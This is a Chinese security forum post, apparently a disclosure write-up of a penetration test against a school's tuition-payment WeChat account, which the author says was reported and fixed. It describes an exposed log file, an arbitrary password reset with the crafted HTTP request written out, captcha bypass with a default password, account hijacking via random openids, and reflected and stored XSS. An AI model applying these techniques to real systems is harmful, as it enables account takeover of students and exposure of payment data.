安全矩阵

 找回密码
 立即注册
搜索
查看: 1168|回复: 0

实战|针对学校公众号的一次渗透

[复制链接]

252

主题

252

帖子

1309

积分

金牌会员

Rank: 6Rank: 6

积分
1309
发表于 2022-8-15 22:44:57 | 显示全部楼层 |阅读模式
原文链接:实战|针对学校公众号的一次渗透


0X01前言
这学期开学交学费的时候,学校开了一个公众号让我们去缴费,随手测试已提交并修复,水文一篇记录一下
0x02信息泄露
一些支付的订单和数据库的信息
xxxxxxxxx.com/wx/log/log.log
编辑
0x03任意密码重置
通过忘记密码的页面
xxxxxxxx.com/toForgetSscret
查看源代码可以看到重置密码的数据包构造
编辑
构造数据包,来重置20xxxxxxxxxx的密码
POST /updateP HTTP/1.1Host: xxxxxxxx.comContent-Length: 41Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"newp":"xX123456","yhbh":"20xxxxxxxxxx"}
发包成功重置
编辑
0x04验证码绕过
虽然不痛不痒但是提一嘴,前端校验数据包内没有验证码字段,默认密码000000,或者重置密码后可以用随机openid来绑定这些账号让他们原主人绑定不上去也算危害
编辑
0x05反射xss
在登入页面的显示头像的参数上过滤不严导出xss
编辑
0x06存储xss
通过存在反射xss的链接去绑定他会存储头像,绑定成功后来到首页就弹窗转换为存储xss
编辑
查看源代码
编辑



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-29 21:25 , Processed in 0.017221 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表